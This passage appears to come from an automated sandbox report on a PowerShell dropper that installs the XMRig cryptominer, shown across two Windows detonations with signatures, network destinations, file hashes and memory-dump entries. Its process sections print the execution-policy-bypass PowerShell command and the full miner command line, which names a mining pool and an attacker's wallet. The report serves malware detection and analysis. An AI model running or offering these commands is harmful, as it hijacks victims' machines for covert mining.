2024-05-27 00:27
Reported
2024-05-27 01:23
Platform
win11-20240508-en
Max time kernel
1791s
Max time network
1765s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2616 wrote to memory of 3608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2616 wrote to memory of 3608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/2616-0-0x00007FFEA7233000-0x00007FFEA7235000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x135bfkr.4ln.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2616-9-0x0000018477420000-0x0000018477442000-memory.dmp
memory/2616-10-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-11-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-12-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-14-0x0000018477920000-0x0000018477932000-memory.dmp
memory/2616-15-0x00000184774C0000-0x00000184774CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3608-46-0x0000010EB5BB0000-0x0000010EB5BD0000-memory.dmp
memory/3608-47-0x0000010EB74B0000-0x0000010EB74D0000-memory.dmp
memory/3608-48-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/2616-49-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-51-0x00007FFEA7233000-0x00007FFEA7235000-memory.dmp
memory/3608-50-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-54-0x0000010EB74F0000-0x0000010EB7510000-memory.dmp
memory/3608-53-0x0000010EB74D0000-0x0000010EB74F0000-memory.dmp
memory/2616-52-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/3608-55-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-56-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-57-0x0000010EB74D0000-0x0000010EB74F0000-memory.dmp
memory/3608-58-0x0000010EB74F0000-0x0000010EB7510000-memory.dmp
memory/3608-59-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-60-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-61-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-62-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-63-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-64-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-65-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-66-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-67-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-68-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-69-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-70-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-71-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-72-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-73-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-74-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-75-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-76-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-77-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-78-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-79-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-80-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-81-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-82-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-83-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-84-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-85-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-86-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-87-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-88-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-89-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-90-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-91-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-92-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-93-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-94-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-95-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-96-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-97-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-98-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-99-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-100-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-101-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-102-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-103-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-104-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-105-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-106-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-107-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-108-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-109-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-110-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-111-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-112-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-113-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-114-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-115-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-116-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-117-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:28
Platform
win10v2004-20240426-en
Max time kernel
1790s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4616 wrote to memory of 4752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4616 wrote to memory of 4752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/4616-0-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gs4w50ua.qju.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4616-1-0x000002CE4B5B0000-0x000002CE4B5D2000-memory.dmp
memory/4616-11-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4616-12-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4616-14-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4616-15-0x000002CE4BAA0000-0x000002CE4BAB2000-memory.dmp
memory/4616-16-0x000002CE4B740000-0x000002CE4B74A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4752-47-0x00000254FF750000-0x00000254FF770000-memory.dmp
memory/4752-48-0x0000025481440000-0x0000025481460000-memory.dmp
memory/4752-49-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4616-50-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4752-54-0x0000025481480000-0x00000254814A0000-memory.dmp
memory/4752-53-0x0000025481460000-0x0000025481480000-memory.dmp
memory/4616-52-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp
memory/4752-51-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4616-55-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4752-56-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-57-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-59-0x0000025481480000-0x00000254814A0000-memory.dmp
memory/4752-58-0x0000025481460000-0x0000025481480000-memory.dmp
memory/4752-60-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-61-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-62-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-63-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-64-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-65-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-66-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-67-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-68-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-69-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-70-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-71-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-72-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-73-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-74-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-75-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-76-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-77-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-78-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-79-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-80-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-81-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-82-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-83-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-84-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-85-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-86-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-87-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-88-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-89-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-90-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-91-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-92-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-93-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-94-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-95-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-96-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-97-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-98-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-99-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-100-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-101-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-102-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-103-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-104-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-105-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-106-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-107-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-108-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-109-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-110-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-111-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-112-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-113-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-114-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-115-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-116-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-117-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-118-0x00007FF643870000-0x00007FF6444A3000-memory.dmp